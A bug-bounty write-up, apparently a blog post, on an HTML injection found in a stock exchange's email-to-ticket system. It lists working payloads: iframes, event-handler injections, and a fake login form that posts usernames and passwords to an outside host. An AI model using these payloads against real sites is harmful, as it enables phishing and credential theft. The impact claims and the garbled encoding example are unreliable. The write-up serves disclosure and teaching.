BOOK THIS SPACE FOR AD
ARTICLE ADI reported a bug in the stock exchange company I don't want to disclose the name of company so I use a name for it "target".
It was my first non duplicate valid bug .
Description
HTML injection is a type of attack where malicious HTML code is inserted into a website.
Steps To Reproduce
The target receive complain through email and creat a ticket that shown in website.So I sent this payload to the target through email and see the ticket in the website.I found that the payload is triggeredPayloads:-
<button type="button">Click Me!</button>
<canvas id="myCanvas">draw htmli</canvas>
<caption>Html</caption>
<cite>Html Html</cite>
<code>Html</code>
<head><base href="https://www.google.com" target="_blank"></head>
<span style="color:blue;font-weight:bold">html</span>
<abbr title="HTML">HTML</abbr>
<acronym title="Armour Infosec">AI</acronym>
<address>address,address</address>
<iframe id="if1" src="https://www.google.com"></iframe>
<iframe id="if2" src="https://www.google.com"></iframe>
<<h1>HTML</h1>
<<h1>HTML</h1>>
<html><body><head><meta content="text/html; charset=utf-8"></meta></head>
<div style="text-align: center;"><form Method="POST" Action="http://www.test.com/">
Phishingpage :<br /><br/>Username :<br /> <input name="User" /><br />Password :<br />
<input name="Password" type="password" /><br /><br /><input name="Valid" value="Ok !" type="submit" />
<br /></form></div></body></html>
<input><input"/onmouseover="confirm(3333);//"onload=onload><input><innerHTML><img src="https://www.petmd.com/sites/default/files/Acute-Dog-Diarrhea-47066074.jpg" width="1000" height="750" alt="onmouseover=prompt(1);//" /></a></input>
HTML injection is a type of attack where malicious HTML code is inserted into a website that lead to lose of reputation and data dump by executing much more commands .
Suggested Fix
HTML encoding: HTML encoding is the process of converting HTML characters, such as < and >, into their corresponding character entities, such as < and >. This can help prevent HTML injection attacks by ensuring that user-submitted data is treated as plain text rather than HTML code.
> I reported the bug on 4th February .
> I got respons on 7 February that the bug was informational and they provide me some swags.